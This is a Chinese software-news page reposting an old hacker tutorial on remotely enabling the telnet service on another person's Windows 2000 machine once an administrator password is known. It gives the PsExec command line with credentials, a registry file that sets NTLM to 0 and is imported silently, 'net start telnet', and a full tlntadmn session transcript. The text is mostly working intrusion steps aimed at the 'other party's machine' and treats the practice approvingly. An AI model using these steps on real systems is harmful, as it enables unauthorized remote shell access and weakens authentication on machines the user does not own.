您的位置:首页精文荟萃软件资讯 → 快速开启对方机器(win2000)的telnet服务

快速开启对方机器(win2000)的telnet服务

时间:2004/10/7 19:05:00来源:本站整理作者:蓝点我要评论(0)

 引子:某日、某天、某时间、某地点、某某人、某台机器、… 
工具:psexec.exe 
试验者:littleshrimp http://www.chinansl.com 
条件:知道对方机器的管理员账号密码任意一个,使用psexec.exe 工具开启对方机器的telnet 服务。实践通过。 

现在在网上流行的开对方机器的telnet 服务的教程有这么两种: 
一、 小榕的流光工具自带的一个工具系列:ntlm.exe runas.exe ……俺觉得繁琐无比:( 
没有轻视小榕的意思:”)觉得小榕能写一个程序修改注册表,不简单:”) 
二、.abu.写的一个快速开启对方机器的telnet 服务的一个教程。说是快,实际上不快:( 
需要操作对方机器的注册表,速度奇慢无比。也没有什么XX意思:”( 
三、俺自己写的一个开启对方机器telnet 服务的教程,呵呵~~不是流行的,---参考:)比较快的一种,呵呵~俺没有自夸,需要两个工具:psexec.exe、ntlm.exe。方法略:”)有更好的你难道不想用么:”) 
呵呵~~对上边的开启telnet 服务的教程,做了一点评论,个人意见,仅供参考。 
今天我讲的快速开启对方机器(win 2000)的telnet服务之需要一个工具即可。 
PSEXEC.EXE 
做一下介绍: 
C:\Tools\Pstools>psexec.exe 

PsExec v1.3 - execute processes remotely 
Copyright (C) 2001 Mark Russinovich 
www.sysinternals.com 

PsExec executes a program on a remote system, where remotely executed console 
applications execute interactively. 

Usage: psexec \\computer [-u user [-p psswd]][-s][-i][-c [-f]][-d] cmd [argument 
s] 
   -u     Specifies optional user name for login to remote 
        computer. 
   -p     Specifies optional password for user name. If you omit this 
        you will be prompted to enter a hidden password. 
   -s     Run the remote process in the System account. 
   -i     Run the program so that it interacts with the desktop on the 
        remote system. 
   -c     Copy the specified program to the remote system for 
        execution. If you omit this option the application 
        must be in the system path on the remote system. 
   -f     Copy the specified program even if the file already 
        exists on the remote system. 
   -d     Don<|>t wait for process to terminate (non-interactive). 
   program  Name of application to execute. 
   arguments Arguments to pass (note that file paths must be 
        absolute paths on the target system). 

You can enclose applications that have spaces in their name with 
quotation marks e.g. psexec \\marklap "c:\long name app.exe". 
Input is only passed to the remote system when you press the enter 
key, and typing Ctrl-C terminates the remote process. 

If you omit a user name the process will run in the context of your 
account on the remote system, but will not have access to network 
resources (because it is impersonating). Specify a valid user name 
in the Domain\User syntax if the remote process requires access 
to network resources or to run in a different account. Note that 
the password is transmitted in clear text to the remote system. 
C:\Tools\Pstools> 
英文的,什么你不懂英文??呵呵~自己还是慢慢摸索吧!! 
这里我们运用这个命令行的两个参数-u –p 介绍一下:-u 就是对方机器的管理员的账号 –p 就是对方管理员账号的密码,如果密码为空则没有 –p 这个选项。 
运行格式:psexec.exe \\对方机器的ip -u 对方机器的管理员账号 –p 对方机器的管理员账号密码 cmd (需要运行的程序) 
步骤命令行下: 
1、 psexec.exe \\ip -u administrator –p foolishman cmd 
2、 进入对方机器 一般是c:\winnt\system32\〉下执行 tlntadmn.exe –呵呵~~这个是个什么程序??Telnet 服务器管理!呵呵~~知道了?? 
3、 可以了,你已经知道该如何做乐:) 
4、 EOF 
进入对方机器后方法2: 
还有一种方法就是写一个reg文件,修改ntlm的值为0或1 
在dos下 
c:\>copy con reg.reg 
Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] 
"NTLM"=dword:00000000 
^z 
c:\>regedit /s reg.reg 不出现确定窗口:") 
c:\>net start telnet 
OK 
开启对方的telnet服务了:")很简洁是不是:") 
方法1附上操作步骤: 
本机运行: 
D:\hack\>tlntadmn 


Microsoft (R) Windows 2000 (TM) (内部版本号 2195) 
Telnet Server Admin (Build 5.00.99201.1) 

请在下列选项中选择一个: 


0) 退出这个应用程序 
1) 列出当前用户 
2) 结束一个用户的会话 ... 
3) 显示 / 更改注册表设置 ... 
4) 开始服务 
5) 停止服务 

请键入一个选项的号码 [0 - 5] 以选择该选项: 3 


请在下列选项中选择一个: 

0) 退出这个菜单 
1) AllowTrustedDomain 
2) AltKeyMapping 
3) DefaultDomain 
4) DefaultShell 
5) LoginScript 
6) MaxFailedLogins 
7) NTLM 
8) TelnetPort 
请键入一个选项的号码 [0 - 8] 以选择该选项: 7 
NTLM 的当前值 = 1 
您确实想更改这个值吗 ? [y/n]y 
NTLM [ 当前值 = 1; 可接受的值 0、1 或 2 ] :0 
您确实想将 NTLM 设置为 : 0 ? [y/n]y 

只有当 Telnet 服务重新开始后设置才会生效 


请在下列选项中选择一个: 

0) 退出这个菜单 
1) AllowTrustedDomain 
2) AltKeyMapping 
3) DefaultDomain 
4) DefaultShell 
5) LoginScript 
6) MaxFailedLogins 
7) NTLM 
8) TelnetPort 
请键入一个选项的号码 [0 - 8] 以选择该选项: 0 

请在下列选项中选择一个: 


0) 退出这个应用程序 
1) 列出当前用户 
2) 结束一个用户的会话 ... 
3) 显示 / 更改注册表设置 ... 
4) 开始服务 
5) 停止服务 

请键入一个选项的号码 [0 - 5] 以选择该选项: 4 
启动 Microsoft Telnet 服务 ... 
Microsoft Telnet 服务启动成功 

请在下列选项中选择一个: 


0) 退出这个应用程序 
1) 列出当前用户 
2) 结束一个用户的会话 ... 
3) 显示 / 更改注册表设置 ... 
4) 开始服务 
5) 停止服务 

请键入一个选项的号码 [0 - 5] 以选择该选项: 0 

############################################################################### 
对方机器上运行: 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) 版权所有 1985-2000 Microsoft Corp. 

C:\WINNT\system32>tlntadmn=>回车!运行telnet管理器,但并不显示菜单:( 
3<=键入 回车 
------------------------ 
1) AllowTrustedDomain 
2) AltKeyMapping 
3) DefaultDomain 
4) DefaultShell 
5) LoginScript 
6) MaxFailedLogins 
7) NTLM 
8) TelnetPort 
------------------------出现的菜单~~ 
7<=键入 回车 
y<=键入 回车 
NTLM0<=键入(0)NTLM不是输入的 回车 
y<=键入 回车 
--------------------- 
1) AllowTrustedDomain 
2) AltKeyMapping 
3) DefaultDomain 
4) DefaultShell 
5) LoginScript 
6) MaxFailedLogins 
7) NTLM 
8) TelnetPort 
---------------------修改NTLM以后出现菜单 
0<=键入 回车 退出这个菜单 
4<=键入 回车 打开telnet服务<=>net start telnet 
0<=键入 回车 退出telnet管理器 

C:\WINNT\system32>OK 已经开启了对方机器的 telnet 服务。

相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 360快剪辑怎么使用 36金山词霸如何屏幕取词百度收购PPS已敲定!3

最新文章 微信3.6.0测试版更新了微信支付漏洞会造成哪 360快剪辑怎么使用 360快剪辑软件使用方法介酷骑单车是什么 酷骑单车有什么用Apple pay与支付宝有什么区别 Apple pay与贝贝特卖是正品吗 贝贝特卖网可靠吗

人气排行 xp系统停止服务怎么办?xp系统升级win7系统方电脑闹钟怎么设置 win7电脑闹钟怎么设置office2013安装教程图解:手把手教你安装与qq影音闪退怎么办 QQ影音闪退解决方法VeryCD镜像网站逐个数,电驴资料库全集同步推是什么?同步推使用方法介绍QQ2012什么时候出 最新版下载EDiary——一款好用的电子日记本